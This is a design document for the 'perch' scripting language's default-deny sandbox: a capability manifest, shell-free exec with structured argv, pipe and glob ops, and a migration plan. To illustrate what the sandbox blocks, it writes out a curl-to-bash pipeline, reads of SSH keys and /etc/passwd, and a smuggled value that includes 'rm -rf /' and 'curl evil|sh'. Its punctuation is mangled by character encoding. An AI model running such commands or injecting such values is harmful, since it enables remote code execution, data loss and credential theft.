Sandboxed by design β zero ambient authority¶
The thesis. A perch program should start with zero access to anything outside itself. No shell. No filesystem. No network. No environment variables. No subprocesses. Every external resource a program touches MUST be declared in the file β and if it isn't declared, the op that needs it fails. No exceptions, no ambient authority, no "it happened to work because the host allowed it."
This is the object-capability / default-deny model applied to the whole language: the file is a sealed box; the only holes in the box are the ones the author cut on purpose, in writing.
Status (what ships today). The shell-free subprocess core of this design is now implemented and tested: the
execop (run a declared binary with structured argv β no shell, no metachar surface), thepipe β¦ endblock (wire stdoutβstdin betweenexecstages with in-process pipes), theglobop (read-scoped wildcard expansion), and the pure line-toolbox (greprejectcutheadtailsort_linesuniq_linescount_lines).execis gated by the same declared-bincheck asshell.execreads like a shell: bare flags/paths work unquoted (exec git log --oneline -10) and a quoted token keeps embedded spaces as one argv slot (exec git commit -m "fix the bug"). Still on the roadmap: the inline|/&&/||operators (Β§3.3),with_exec(Β§3.4), named capability handles (Β§3.1), and flipping the default from ambient to deny (Β§8, Β§11). The per-primitive status table is in Β§3.5. The capy grammar-engine gaps this design originally hit have since been fixed upstream β see capy-limitations.md for what was resolved and what perch adopted.
1. Why¶
Today perch has the inverse default. A freshly written .perch can shell "curl β¦ | bash", read ~/.ssh/id_rsa, write anywhere, and dial any host β unless the operator remembers to pass --no-shell --no-network --no-write β¦ at launch. Security is opt-out, enforced by the person running the file, not declared by the person who wrote it.
That's backwards for the world perch is built for:
- AI-generated programs. When an agent writes the
.perch, "the operator will remember the right flags" is not a control. The file must carry its own limits. - Supply-chain. A recipe you
curl-and-run should be able to do only what it says it does, by construction β not by you guessing the right sandbox flags. - Auditability. "What can this touch?" should be answerable by reading the top of the file, and that answer should be complete and enforced, not advisory.
The requires block (shipped today) is the seed of this β but it's opt-in (only enforces when present) and partial (covers bins / hosts / env, not filesystem paths or the shell-capability gate itself). This doc describes finishing the job: making declaration mandatory and total.
2. What counts as an external resource¶
Every op is exactly one of two kinds.
Pure ops β always allowed, need no grant¶
Computation over values already in memory. No I/O, no clock, no entropy, no environment. These can never harm anything, so they're ungated:
trim Β· lower Β· upper Β· replace Β· split Β· join Β· contains Β· slice Β· format Β· length Β· pad_* Β· repeat Β· md5 Β· sha1 Β· sha256 (of a string) Β· crc32 Β· base64_* Β· hex_* Β· url_* Β· json_parse Β· json_get Β· json_stringify Β· csv_parse Β· regex_match Β· regex_replace Β· regex_find_all Β· version_extract Β· version_* compare Β· print / println (writing to the program's own stdout is not an external resource) Β· the control-flow blocks (if, for_each, match, try, parallel, timeout, retry).
Effectful ops β denied unless the matching capability is granted¶
| Capability | Ops it gates | Grant |
|---|---|---|
| shell | shell, shell_output, shell_detached |
shell + bin "β¦" allowlist |
| read | read_file, stat, exists, is_file, is_dir, list_dir, walk_dir, file_size, file_mtime, sha256_file / md5_file (hashing a file) |
read "PATH"β¦ |
| write | mkdir, cp, mv, rm, touch, chmod, write_file, append_file, mktemp, mktemp_dir, gzip/ungzip/tar_*/zip_* (when writing) |
write "PATH"β¦ |
| net | http_get, http_post, http_put, http_delete, download, dns_lookup, port_check, get_ip |
net + host "β¦" allowlist |
| env | get_env, set_env, unset_env, and ${UPPER_CASE} env fall-through |
env "NAME"β¦ |
| subprocess | pkg_install, kill_by_name, wasm_run (it can be granted host imports) |
subprocess / declared per-op |
| cwd change | cd, with_cwd |
covered by read/write on the target |
| clock / entropy / sysinfo | now, format_time, get_os, get_arch, hostname, user, pid |
low-risk ambient; see Β§6 β likely allowed by default, but listed for completeness |
The principle: if the op's behavior depends on, or changes, the world outside this program's own memory and stdout, it needs a grant.
The subprocess trust boundary (honest scope)¶
perch gates which binaries run (the declared-bin check) and what environment they start with β but it cannot police what a binary does internally, because it can't parse an arbitrary tool's arguments. Be precise about what is and isn't enforced on a spawned docker / git:
- Environment β enforced (scrubbed). A subprocess does not inherit the host environment. It starts with only: a default operational set (
PATH,HOME,TMPDIR,LANG, β¦ β the OS plumbing tools need, provided for you so you needn't redeclare it), the vars the file declared viarequires env "NAME", names the operator allowed via--env, and the program's own bindings + per-commandenv. An undeclared secret (AWS_SECRET_KEY,GITHUB_TOKEN) is dropped β the tool literally cannot read it. (Scrubbing is on whenever arequiresblock is present; a missing block is an empty manifest, so it's on by default.) - Filesystem & network β NOT yet enforced for subprocesses.
requires read / write / hostbound perch's own ops (read_file,write_file,http_get). They do not confine a spawned binary: oncegit cloneruns it can reach any host and write anywhere the OS user can. Closing this requires OS-level confinement βsandbox-exec(macOS), Landlock / bubblewrap (Linux) β which is on the roadmap. Per-host network filtering for arbitrary binaries is fundamentally hard and may stay best-effort.
For hard isolation today, run perch itself inside a container/VM with the FS and network already limited; perch's manifest then describes intent and scrubs the env, and the container enforces the rest.
3. The target grammar¶
requires becomes the single, mandatory capability manifest. It already declares bins / hosts / env; we extend it with shell, read, write, net, subprocess, and per-path filesystem scopes:
requires
# Subprocess execution β off unless declared, AND every bin is allowlisted.
# Pin a hash to nail down the exact build (read-only; no version probe).
shell
bin "git"
hash "sha256:abc123β¦"
end
bin "docker"
end
# Filesystem β per-path, no ambient access to the rest of the disk.
read "./src" "./config" "${home}/.gitconfig"
write "./build" "./dist" "${temp_dir}/myapp"
# Network β off unless declared, AND every host is allowlisted.
net
host "api.github.com"
host "*.amazonaws.com"
end
# Environment β per-name; nothing else is visible to the program.
env "HOME" "KUBECONFIG"
env "DEBUG" optional
# Host shape (already supported).
os "linux" "darwin"
arch "amd64" "arm64"
end
Rules:
- No
requiresblock β zero external authority. The program can compute (pure ops) and print, nothing else. Ashellorread_filein such a file errors at parse/preflight time. read/writetake path scopes. A path is allowed if it's inside one of the declared roots (prefix match on the canonicalized absolute path) or matches a declared glob.read_file "/etc/passwd"with onlyread "./src"declared βread_not_permitted.shellandnetare two-level. Declaringshellpermits subprocess at all; the nestedbinlines say which. Same fornet+host. Declaringshellwith nobinlines is a no-op (you permitted the capability but allowlisted nothing) β and--checkwarns.- Pure ops are never mentioned. You never declare "I want to use
upper."
3.1 Named external resources (capability handles)¶
Declaring a resource also binds it to a name. You then refer to the resource by that name everywhere in the file, and the reference is self-validating β the handle carries its own grant, so using it is proof you declared it. Rename the underlying path/host/version in one place and every call site follows.
Declaration β as NAME¶
Every requires entry gets a name. The name defaults to the resource's natural identifier (the bin name, the env-var name); as NAME overrides it:
requires
bin "git" # handle: git (defaults to the bin name)
bin "kubectl" >= "1.28.0" as kc # handle: kc (explicit alias)
read "./src" as src
read "${home}/.gitconfig" as gitconfig
write "./dist" as dist
net "api.github.com" as gh
net "*.amazonaws.com" as aws
env "KUBECONFIG" as kubeconfig
env "DEBUG" optional as debug
end
A handle is a file-scoped identifier (snake_case, no leading digit). It belongs to exactly one kind β bin, path, host, or env β and that kind determines where it may be used.
Reference β use the name, not the string¶
Each effectful op takes its primary resource as a handle in a known position, so the op kind + position tells the validator which namespace to resolve against. Arguments after the handle are argv tokens β bare words, exactly like typing at a shell:
command build
do
git status # bin handle + bare argv β reads like the shell
kc apply -f k8s/ # (no shell, no string parsing, no metachar surface)
conf = read_file src config.yaml # path handle + bare subpath, joined + re-checked
write_file dist out.txt "${conf}" # path handle; value with content stays quoted/interpolated
repo = http_get gh /repos/me/app # host handle + bare path β https://api.github.com/...
kube = get_env kubeconfig # env handle
end
end
Argument tokens β when do you quote?¶
After a handle, each token is taken literally unless it needs otherwise. The rule is the shell's, not perch's:
| You write | perch sees |
|---|---|
exec git status |
argv ["status"] β bare word, literal |
exec git log --oneline -10 |
argv ["log","--oneline","-10"] β flags are just tokens |
exec kc apply -f k8s/deploy.yaml |
argv ["apply","-f","k8s/deploy.yaml"] β slashes/dots are fine bare |
exec git commit -m "fix the bug" |
argv ["commit","-m","fix the bug"] β quote only the token with a space |
exec git checkout "${branch}" or exec git checkout ${branch} |
argv ["checkout", <value of branch>] β ${β¦} interpolates a binding |
So: bare for plain words and flags, quotes only when a token contains whitespace, ${β¦} to splice a value binding. You never quote status, -f, or k8s/ β same as you wouldn't in a terminal.
Semantics:
exec HANDLE token token β¦βHANDLEis a bin handle; the tokens are argv passed straight to the binary. No shell, no word-splitting of the tokens, sobin_not_declared/ metachar injection can't happen β the bin is structural and each token is one argv slot.read_file HANDLE subpathβHANDLEis a path handle naming a read root. The bare subpath is joined and re-canonicalized; if the result escapes the root (via.., a symlink, etc.) it'sread_not_permitted.read_file HANDLEalone reads the root if it's a file.http_get HANDLE pathβHANDLEis a host handle. The bare path is appended to the declared host (scheme defaults tohttps; declarenet "http://β¦"to allow plain).get_env HANDLEβHANDLEis an env handle resolving to the declared variable.
Why this is safe even though it looks like a shell. A shell word-splits and re-globs the whole line, which is where injection lives. Here, each token is captured by the parser as exactly one argv element and handed to
execuntouched βexec git commit -m "${msg}"puts the entire${msg}value in one argv slot even if it contains spaces, semicolons, or$(β¦). It reads like a shell but has none of the shell's re-interpretation.
Validation β the reference is the proof¶
Every handle reference is checked statically by perch --check and at runtime by the capability gate:
| Situation | Result |
|---|---|
Handle used but never declared in requires |
unknown_capability (static error β --check fails) |
| Handle used in the wrong position (a path handle where a bin is expected) | capability_kind_mismatch (static error) |
| Path-handle subpath escapes the declared root | read_not_permitted / write_not_permitted (runtime) |
| Everything resolves | runs; the gate is satisfied because the handle is a grant |
Because the handle can only exist if it was declared, referencing it is the validation β there's no separate "is this allowed?" check to forget. Unknown handle β the file doesn't compile.
Why this is better than bare strings¶
- One source of truth. The host
api.github.com, the path./src, the kubectl version floor β each is written once. Bump it in therequiresblock; every call site updates automatically. - Refactor-safe. Move a service to a new host: change
net "β¦" as ghand nothing else. Call sites saygh, not the literal. - No string-sniffing.
exec git statusis unambiguously a declared bin + argv. The validator never has to parse a shell string to discover what bin ran β eliminating both the static-analysis guesswork and the injection surface. - Reads as intent.
http_get gh "/repos"says "talk to the GitHub handle," not "dial whatever this string resolves to." Reviewers see the capability, not the plumbing. - Diff-friendly for audits. A PR that adds a capability adds a named line to
requiresβ the reviewable unit is "this file now has a handleaws," not "grep the body for new hosts."
Disambiguation from value bindings¶
perch already has value bindings (url = β¦, ${url}) and the bare-ident arg form (print url). Capability handles are a separate namespace, resolved by op-position: the first arg of exec / read_file / http_get / get_env is a handle, not a value binding. Where ambiguity would arise, the value form stays available with the string syntax (http_get "${url}"), and the handle form is the bare ident (http_get gh "/path"). --check flags a bare ident in a handle position that matches no declared handle.
Honest caveats¶
- This needs the capability model from Β§2βΒ§4 to exist first; handles are sugar over the grants, not a replacement for them.
- Handles are file-scoped. Imported files (
import "./lib.perch") would need either their ownrequiresor an explicit re-export rule β TBD, tracked with the import design. - A path handle is still a prefix/glob grant, not a chroot (Β§10) β the subpath re-check reduces, but a hardened canonicalizer is what closes
../symlink escapes.
3.2 Removing shell entirely β only declared binaries¶
The strongest version of this model deletes the shell op altogether. There is no sh -c, no shell string, no --no-shell-metachars flag, no allowlist-parsing of a command line. The only way to run a subprocess is to exec a declared binary with structured argv:
# Today
shell "docker ps -q -f name=^web$ | wc -l"
# Sandboxed-by-design, shell removed (ships today). Bare flags/filters
# need no quotes; a quoted token keeps embedded spaces as one slot.
n =
pipe
docker ps -q -f name=^web$
wc -l
end
A subprocess is always exec <declared-bin-handle> <token> <token> β¦. Each token is one argv slot; nothing is ever handed to a shell to re-interpret.
Pros¶
- The single largest attack surface disappears β structurally, not by policy. Every HIGH finding
--scanraises today is a shell-string problem: catchβshell ${proxy_args}, unvalidated${var}in a shell command,curl β¦ | bash. With noshellop there is nothing to inject into.--no-shell-metachars,checkShell, first-token allowlist parsing, the metachar denylist β all of it becomes dead code you can delete. - Subprocess analysis becomes total and trivial. "Which binaries can this file run?" has an exact, static answer: the set of declared bin handles. No more "we can't tell what this shell string runs because it's interpolated."
--scan/--check/simulatego from heuristic to complete. - The capability model has no second-class hole. Today
shellis a megacapability β grant it and the named bin can pipe into anything. With exec-only, "subprocess" is exactly the declared bins and their declared argv shapes; there's no "...and also a shell that can run arbitrary pipelines." - True cross-platform.
exec git statusbehaves identically on macOS / Linux / Windows.shell "a && b"depends onshvsbashvscmd.exeexisting and agreeing on&&, quoting, and glob rules β the exact "works on my machine" problem perch exists to kill. - It forces composition into perch, where it's inspectable. A pipeline expressed as perch ops (capture β transform β next) is visible to the audit log, the span tree, and the validator. A pipeline buried in a shell string is opaque to all three.
Cons / what you lose¶
- Pipes.
a | b | cis the thing people will miss most. Without a shell you compose by capturing output and feeding the next op β more verbose, and genuinely awkward for long pipelines until perch grows first-class plumbing (see What perch must add below). - Globbing.
rm *.tmprelies on the shell expanding the glob. Exec-only means*.tmpreaches the program literally β you'dwalk_dir+ filter +rmeach, unless perch ships aglobop. &&/||/;one-liners. Replaced by perch's own sequencing (ops run in order),if, andtry. Mostly a wash, butmkdir x && cd xbecomes two lines.- Env-assignment prefixes.
GOOS=linux go buildis shell syntax. Becomeswith_env "GOOS=linux" β¦ exec go build β¦ endβ more structured, more typing. - Heredocs / process substitution / shell builtins.
cat <<EOF,<(β¦),${VAR:-default}β gone. Each needs a perch equivalent (write_filefor heredocs, etc.). - Migration cost is real and large. Every existing
.perchand recipe that usesshellmust be rewritten. The current recipes are docker-heavy and lean on pipes (docker ps β¦ | β¦); converting them is non-trivial. - The escape-hatch tail. Occasionally you genuinely need a shell β a gnarly one-off pipeline, or a vendor tool whose only documented invocation is a shell line. "perch literally cannot do what bash can here" will frustrate some users for that tail of cases.
What perch must add first to make this viable¶
Removing shell is only reasonable once the common shell idioms have first-class, shell-free replacements:
- A
pipeblock that wiresstdout β stdinbetween declared bins without a shell: - A
globop βfiles = glob "*.tmp"(scoped to a declaredreadroot) so wildcard removal/iteration has a structured form. with_env(already exists) covers env prefixes; ops run in sequence already covers;;if/trycover&&/||.- Output capture + the string/JSON/regex ops (already exist) cover most of what a pipeline's middle stages did with
grep/awk/sed.
The honest escape hatch¶
For the irreducible tail that truly needs a shell pipeline: don't put it in an inline string β put it in a file, declare it, and pin it.
requires
shell # the capability, if we keep a gated form
bin "./scripts/pipeline.sh" hash "sha256:β¦"
end
end
command report
do
./scripts/pipeline.sh "${date}" # the shell complexity is a named, hash-pinned artifact
end
end
Now the shell lives in a reviewable, hash-pinned .sh file that the manifest declares β not in an ambient inline string. The "everything external is declared and pinned" invariant holds even for the shell escape. This is the middle path between "keep inline shell" and "remove it with no recourse."
Verdict (for discussion)¶
Three positions, weakest β strongest:
- Keep
shell, gate it (shell { bin β¦ }capability, Β§3). Lowest migration cost; preserves pipes; but the metachar/injection surface and the "shell is a megacapability" hole remain. - Remove inline
shell, allow exec-of-declared-shell-script (the escape hatch above). Eliminates the inline-injection surface; pipelines that truly need a shell become declared, hash-pinned files; cost is rewriting recipes + buildingpipe/glob. - Remove
shelland any shell entirely β onlyexecof declared non-shell bins, pipelines only via perch'spipe. Maximum guarantee ("no shell anywhere, ever"); highest cost; the escape-hatch tail has no recourse but to ship a non-shell helper binary.
Position 2 is the recommended target: it delivers nearly all the security value of 3 (no inline shell string, nothing to inject into) while leaving a declared, pinned path for the genuinely-needs-a-shell tail. 3 is the purist end state worth reaching only after pipe/glob have proven they cover the real recipes without a shell. 1 is the pragmatic first step that ships without a recipe rewrite.
3.3 Bringing back && / || / ; and KEY=val β without a shell¶
Removing shell doesn't mean giving up the ergonomics people associate with it. The two most-missed shell features β conditional chaining (&& / || / ;) and per-command env prefixes (GOOS=linux β¦) β can come back as perch grammar around exec. The difference from a shell is the whole point: perch parses these as structure; they never become a string an external shell re-interprets.
Chaining operators are perch operators, not shell metachars¶
git pull && go build && go test # each clause is a structured exec
which gh || brew install gh # RHS runs only if LHS failed
stop_old ; start_new # run both regardless
These parse into a chain of exec clauses joined by perch-level operators. Each clause is still exec <declared-bin> <tokens> β there is no sh -c, no word-splitting of a line, no glob. The operators are evaluated by the interpreter on the exit code of each clause:
| Operator | Meaning |
|---|---|
A && B |
run A; run B only if A exited 0. Short-circuits leftβright. |
A \|\| B |
run A; run B only if A exited non-zero. |
A ; B |
run A, then B, regardless of A's exit. (Same as two lines; offered for one-liners.) |
Semantics worth pinning down:
- A bare
execthat exits non-zero raises (perch's normal error model β aborts the command unless caught bytry). Inside a&&/||chain, the operator consumes the exit code instead:exec a && exec bdoes not raise ifafails β it just skipsb. The chain raises only if its last actually-run clause exits non-zero. (If you want "abort on any failure," that's the default sequential form β separate lines.) - In an
ifcondition the chain is boolean.if exec test -f x && exec grep -q foo x ... endis true iff the whole chain succeeded β no abort, the exit codes drive the branch. - Operators can only be literal source tokens. They are recognized by the parser between
execclauses; an interpolated${x}can never become an&&(see the keystone below). You cannot construct an operator at runtime.
This is sugar over control flow perch already has (if exit_code == 0, sequential ops, try), surfaced in a form that reads like the shell line it replaces β but with each command structurally bound to a declared bin.
Per-exec env prefixes¶
The leading KEY=val tokens are parsed as a localized environment overlay for that single exec β sugar for wrapping it in with_env. Rules:
- The bin is the first non-assignment token (
gohere), and it must be a declared handle βGOOS=linuxdoes not makeGOOSthe bin. - Each
KEY=valis one structured assignment; the value may interpolate (GOOS=${target}) but interpolation fills only that value slot. - The overlay is scoped to the single
execand restored after β it does not leak to later ops (unlikeexport/set_env, which are deliberate process-lifetime changes).
The keystone: parse first, interpolate second β never the reverse¶
This is the single most important rule that makes all of the above safe, and it's the exact inversion of how a shell works:
A
${var}can only become the content of a slot that already exists in the already-parsed structure β one argv token, or oneKEY=valvalue. It can never introduce a new token, a newKEY=val, an operator (&&/||/;), a redirect, a glob, or a second command.
Shells do interpolate-then-parse: they splice $var into the command line and then lex/parse the result, so a value containing ; rm -rf / becomes new syntax. perch does parse-then-interpolate: the structure (bin handle, argv slots, env slots, chain operators) is fixed by the parser before any ${var} is resolved, and resolution only fills leaf slots.
Concretely:
git receives exactly one -m argument whose value is the literal string v1.0; rm -rf / && curl evil|sh. The ;, &&, | are data inside one argv slot β not operators, not new commands. There is no parse step after interpolation for them to influence. The same value in a shell (git commit -m "$msg" without perfect quoting) is a catastrophe; here it is simply a weird commit message.
This is why &&/||/env-prefixes can be added back without reopening the injection hole: they exist only as literal structure the author typed, fixed before any untrusted value is substituted.
3.4 with_exec BIN β¦ end β a bin-scoped block¶
When you call the same binary several times in a row β docker compose up, docker compose exec β¦, docker ps β repeating exec docker on every line is noise. with_exec scopes a declared bin handle so each line inside the block is an invocation of it:
is exactly equivalent to:
This is the same family as with_env / with_cwd β a context block that factors a shared setting out of the body. Here the shared setting is which bin runs.
Rules¶
- The block head names a declared bin handle (
dockermust be inrequires). It's declared once, at the block head β reinforcing "always a defined bin," never a string. - Each bare line is the argv passed to that bin, same token rules as inline
exec(Β§3.1: bare words literal, quote only for spaces,${β¦}fills one slot). - Lines run top-to-bottom; a failing line raises (perch's normal abort-on-error). That gives you
&&-style "stop on first failure" sequencing for free β which is what a multi-step session with one tool almost always wants. To continue past a failure, use|| exec β¦on that line or wrap it intry. - An inner line may start with its own
execto call a different bin β it overrides the scoped bin for that line only: - Composes with the other context blocks. Wrap in
with_cwd/with_envto add a shared directory or environment:
How it relates to the other forms¶
| Form | Use when |
|---|---|
exec BIN args |
a one-off call |
exec a && exec b (Β§3.3) |
two-or-three commands with conditional/exit-code logic on one line |
with_exec BIN β¦ end |
several calls to the same bin in sequence (abort on first failure) |
pipe β¦ end (Β§3.2) |
wiring one command's stdout into another's stdin (no shell) |
Honest notes¶
- It's pure sugar β it lowers to a sequence of
exec BIN β¦ops, so it adds nothing to the capability model and changes no security property. The bin is still a declared handle; tokens are still structured argv; interpolation still fills leaf slots only (Β§3.3 keystone). - It only helps when you're calling one bin repeatedly. Mixed-bin sequences read better as plain
execlines. - Branching inside the block uses perch's normal
if/try;with_execdoesn't introduce its own control flow.
3.5 The shell toolbox, perch-native¶
The pitch: keep the syntax people already know β |, &&, ||, < β but perch parses every command and manages every process itself. A pipeline isn't handed to sh -c; perch lexes it into a list of exec <declared-bin> <argv> stages and wires them with in-process os.Pipes. Same shape on the page, none of the shell's word-splitting / globbing / re-interpretation. This section shows how each shell idiom is expressed with the current op catalog (marked exists) plus the few primitives this design adds (marked proposed).
A note on legend: (exists) = shippable today with the current ops; (proposed) = a small new op/operator this design introduces.
Pipe β stdout β stdin wiring (proposed: the | operator + pipe block)¶
| is a perch operator (like &&), parsed between exec clauses. perch opens an io.Pipe between stage N's stdout and stage N+1's stdin β no shell.
# bash: docker ps -q | wc -l
n = exec docker ps -q | exec wc -l # inline, two stages
# bash: kubectl get pods -o json | jq -r '.items[].metadata.name' | sort
names =
pipe
kubectl get pods -o json
jq -r ".items[].metadata.name"
sort
end # block form for 3+ stages
- Every stage is still
exec <declared-bin> <structured-argv>. The|never reaches a shell; it's process plumbing perch owns. - The chain's value is the last stage's stdout (capturable with
let). Its exit status follows Β§3.3 rules (a failing stage raises unless consumed). - A pipeline of declared bins is fully analyzable:
--scanlists every bin in the chain; there's no opaque shell string.
stdin from a value (proposed: | accepts a string on its left)¶
The left side of | may be a string value instead of an exec β perch feeds it to the right stage's stdin. This replaces echo β¦ | and heredocs:
# bash: echo "$json" | jq '.name'
name = "${json}" | exec jq -r ".name"
# bash: jq '.x' <<< "$data"
x = "${data}" | exec jq ".x"
"${json}" is one stdin stream, never re-parsed β the Β§3.3 keystone holds: an interpolated value can only ever be data on a stream, never new commands.
Glob β expand wildcards (exists via walk_dir; proposed sugar: glob)¶
The shell expands *.tmp before the command sees it. perch never does ambient globbing β you ask for matches explicitly, scoped to a declared read root.
# today (exists): walk + filter
all = walk_dir src
for_each all f
if regex_match "\\.tmp$" f
rm f # within a declared write root
end
end
# proposed sugar: one op
tmp = glob "src/**/*.tmp" # list, scoped to read root `src`
for_each tmp f
rm f
end
glob is sugar over walk_dir + a pattern match; it never escapes the declared root (the Β§10 canonicalizer applies).
Stream transforms β replace grep / sed / awk / cut / head / sort / uniq / wc¶
Work on captured output as lines. Most of this exists today with string/regex ops; a thin line-oriented layer makes it ergonomic.
| Shell | perch (exists) | perch (proposed sugar) |
|---|---|---|
β¦ \| grep PAT |
for_each (split out "\n") l + if regex_match PAT l |
grep PAT out β matching lines |
β¦ \| grep -v PAT |
same with if not regex_match |
reject PAT out |
β¦ \| sed 's/a/b/g' |
regex_replace "a" "b" out |
β (already one op) |
β¦ \| awk '{print $2}' |
split line " " then index _1 |
cut 2 out (whitespace columns) |
β¦ \| cut -d, -f1 |
split line "," then index _0 |
cut 1 out sep="," |
β¦ \| head -n 5 |
slice lines 0 5 |
head 5 out |
β¦ \| tail -n 5 |
slice lines -5 |
tail 5 out |
β¦ \| sort |
β | sort_lines out |
β¦ \| uniq |
β | uniq_lines out |
β¦ \| wc -l |
length (split out "\n") |
count_lines out |
# bash: git log --oneline | grep fix | head -5
log = git log --oneline
fixes =
pipe_value log # proposed: thread a value through line transforms
| grep "fix"
| head 5
end
# or, with today's ops only:
lines = split "${log}" "\n"
for_each lines l
if contains l "fix"
print l
end
end
The proposed lines/grep/cut/head/tail/sort_lines/uniq_lines/count_lines are all pure ops (stringβstring, no capability) β they need no grant and compose with | on values.
Process composition β prefer native over piping to a tool¶
The most ergonomic move is often to skip the external tool entirely. perch ships json_parse / json_get / json_count, so the classic β¦ | jq is frequently unnecessary:
# bash: kubectl get pods -o json | jq -r '.items[0].metadata.name'
raw = kubectl get pods -o json
name = json_get "${raw}" ".items[0].metadata.name" # no jq, no pipe, no second bin to declare
When you do compose tools, do it with managed pipes (above), &&/|| (Β§3.3), with_exec (Β§3.4), and for_each over captured lists β every step a declared bin, every wire owned by perch.
JSON / text ergonomics (mostly exists)¶
The building blocks shipping today:
body = curl -s https://api.github.com/repos/me/app # (curl declared)
stars = json_get "${body}" ".stargazers_count"
topics = json_count "${body}" ".topics"
print "${stars} stars, ${topics} topics"
# text munging without sed/awk:
csv = read_file data "report.csv"
rows = csv_parse csv # exists
first = split (slice rows 0 1) "," # first row β fields
# build JSON safely (single-quote delimiter avoids escaping the "):
payload = format '{"name":"${name}","count":${count}}'
"${payload}" | exec http post-helper # or use http_post directly
json_parse Β· json_get (path) Β· json_count Β· json_stringify Β· csv_parse Β· split / join Β· regex_* Β· format Β· trim / lower / upper are all pure β no capability, no shell, cross-platform identical.
Summary β what ships when¶
| Primitive | Status |
|---|---|
exec of a declared bin with structured argv |
ships (core of Β§3.2) β exec BIN tokβ¦; bare flags/paths unquoted, quote only tokens with spaces |
pipe β¦ end block (stdoutβstdin between exec stages, no shell) |
ships β out = pipe β¦ end captures the final stage |
glob |
ships (read-scoped) |
grep / reject / cut / head / tail / sort_lines / uniq_lines / count_lines |
ships (pure ops) |
&& / \|\| / ; between execs |
proposed (Β§3.3) |
with_exec BIN β¦ end |
proposed (Β§3.4) |
\| inline pipe operator + string-on-left (stdin feed) |
proposed (the pipe β¦ end block ships; the inline \| operator does not) |
split / join / slice / regex_match / regex_replace / regex_find_all / length / contains / format / trim / lower / upper |
exists |
json_parse / json_get / json_count / json_stringify / csv_parse |
exists |
read_file / write_file / walk_dir / list_dir / for_each |
exists |
The through-line: perch already has the value-manipulation half of the shell toolbox (string/JSON/regex/list ops are pure and shipping). What's missing is the process half β exec, the |/&&/|| operators, and a little line-oriented sugar β and all of it is perch-managed, so the shell's syntax survives while the shell itself, and its injection surface, does not.
4. Enforcement model¶
One new layer in the interpreter: a capability check before every op dispatch.
for each op about to run:
cap := capabilityOf(op.Kind, op.Args) // from the classification table (Β§2)
if cap == None: proceed
if program.Grants.Permits(cap, op.Args): proceed
else: return *_not_permitted error // typed, matchable in try/rescue
- Default-deny.
program.Grantsis built solely from therequiresblock. Empty block (or no block) β permits nothing effectful. - Path checks canonicalize then prefix/glob-match against
read/writeroots. - Host checks reuse today's allowlist logic.
- Operator flags still compose AND-wise.
--no-networkat launch can further restrict below what the file declared, but can never grant beyond it. The file'srequiresis the ceiling; operator flags lower it. Neither can exceed the other β same intersection model perch already uses, but now the file's side defaults to nothing instead of everything.
New error kinds: shell_not_permitted, read_not_permitted, write_not_permitted, net_not_permitted, env_not_permitted, subprocess_not_permitted β joining the existing bin_not_declared / host_not_declared / env_not_declared (which become the finer-grained failures once the capability itself is permitted). The named-handle layer (Β§3.1) adds two static kinds surfaced by perch --check: unknown_capability (a handle that was never declared) and capability_kind_mismatch (a handle used in the wrong position).
5. Where this differs from today (gap analysis)¶
| Dimension | Today | Target |
|---|---|---|
| Default authority | Ambient β everything (shell, fs, net, env all work) | Zero β nothing works until declared |
requires block |
Opt-in (enforces only when present) | Mandatory semantics (absence = deny-all) |
| Shell | On by default; --no-shell to remove |
Off by default; shell { β¦ } to add |
| Filesystem | On by default, whole disk; --no-write / write-roots to narrow |
Off by default; read/write per-path to add |
| Network | On by default (SSRF-guarded); --allow-host to pin |
Off by default; net { host β¦ } to add |
| Env | All host env visible; --env A,B to narrow |
Nothing visible; env "A" to add |
| Who sets the policy | The operator, at launch, via flags | The author, in the file, by declaration (operator can only tighten) |
| Enforcement point | Scattered (per-op restriction layer, opt-in) | One capability gate, every op, always |
The pieces already in place that this builds on: the requires parser + domain types, the bin_not_declared / host_not_declared / env_not_declared runtime guards, the static perch --check enforcement, the HTTP SSRF/allowlist layer, the sandbox block's static checker, and the per-op restriction hooks (ApplyRestrictions). The work is to unify them under one default-deny gate and extend coverage to filesystem paths and the shell/net capability switches.
6. What would have to change β code¶
Concrete, by VHCO layer:
domain/program.go β extend Requirements:
type Requirements struct {
Declared bool
Shell bool // `shell` capability permitted at all
Net bool // `net` capability permitted at all
Subprocess bool
Bins []BinReq // (exists)
Hosts []HostReq // (exists)
Envs []EnvReq // (exists)
ReadRoots []string // NEW β allowed read path scopes
WriteRoots []string // NEW β allowed write path scopes
OS, Arch []string // (exists)
}
domain/capability.go (new) β the opβcapability classification table + a Grants.Permits(cap, args) method. This is the single source of truth for "what does op X need."
domain/errors.go β add the six *_not_permitted kinds.
infra/capyloader/lib.capy + loader.go β grammar for shell { bin β¦ }, net { host β¦ }, read "β¦" β¦, write "β¦" β¦, subprocess. (The two-level shell/net blocks reuse the existing block-event machinery.)
infra/interpreter/interpreter.go β the pre-dispatch capability gate (Β§4). One function, called from RunOp before the handler. Reads i.Program.Requirements; honors the AND-with-operator-flags rule.
infra/ops/* β every effectful op tagged with its capability (a map[string]Capability registered alongside handlers). Most ops already return tagged errors; this adds the pre-flight gate so they never run when denied.
io/cli + orchestrator β flags (--no-shell etc.) move from "remove ambient capability" to "lower the file's ceiling further." A new flag like --ambient (or --legacy) re-enables the old all-access default for migration (see Β§8).
usecases/validate β --check already flags undeclared literal bins/hosts/env; extend it to flag undeclared capabilities (a literal read_file "./x" with no read grant) statically.
usecases/scan + simulate β both already model capabilities; they consume the richer manifest instead of inferring from op usage.
7. What would have to change β docs & GH Pages¶
This is a framing inversion, not just new pages. Every place that says "perch can do X; restrict with --no-X" must flip to "perch can do nothing; grant X with a requires block."
docs/index.md(GH Pages home) β the hero and the "For platform / SRE / security teams" grid currently lead with capability gating via CLI flags. Reframe the headline security story as default-deny / zero ambient authority, with the CLI flags demoted to "tighten further." Therequireschip already exists; it becomes the centerpiece, not a footnote.docs/sandbox.mdβ the biggest rewrite. Today it explains the capability model as operator-applied flags with an ambient-everything default. It must invert: the file declares, the default is nothing, the operator can only subtract. The "who writes the sandbox" section (author declares / user grants / runtime enforces the intersection) stays β but the default moves from "everything" to "nothing," which is the whole point.- Every code example with an effectful op β
